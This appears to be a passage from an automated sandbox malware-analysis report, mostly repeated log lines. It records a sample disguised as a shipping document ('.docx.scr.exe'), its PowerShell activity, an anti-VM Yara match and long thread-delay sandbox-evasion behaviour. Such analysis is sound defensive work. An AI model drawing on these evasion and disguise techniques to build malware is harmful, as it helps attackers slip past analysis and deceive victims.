Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTR

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: 26E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: 2970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: 26E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: 8D90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: 9D90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: 9FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: AFA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: B610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: C610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: D610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: 3180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Memory allocated: 5180000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239890	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239778	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239672	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239560	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239449	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239343	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239234	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 239125	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 238989	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 238875	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 238747	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 238641	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 238510	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 238323	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 237988	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 237797	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 237650	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 237546	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 237398	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599843	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599718	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599606	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599492	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599265	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 599046	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598499	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598167	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597815	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 597030	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596804	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596694	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596532	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596296	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 596077	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595968	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595749	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594874	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594654	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Thread delayed: delay time: 594327	Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Window / User API: threadDelayed 1175	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Window / User API: threadDelayed 2105	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1957	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 824	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Window / User API: threadDelayed 2187	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Window / User API: threadDelayed 7664	Jump to behavior

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -239890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -239778s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -239672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -239560s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -239449s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -239343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -239234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -239125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -238989s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -238875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -238747s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -238641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -238510s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -238323s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -237988s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -237797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -237650s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -237546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 796	Thread sleep time: -237398s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216	Thread sleep count: 1957 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7204	Thread sleep count: 824 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe TID: 7344	Thread sleep time: -600000s >= -30000s	Jump to behavior
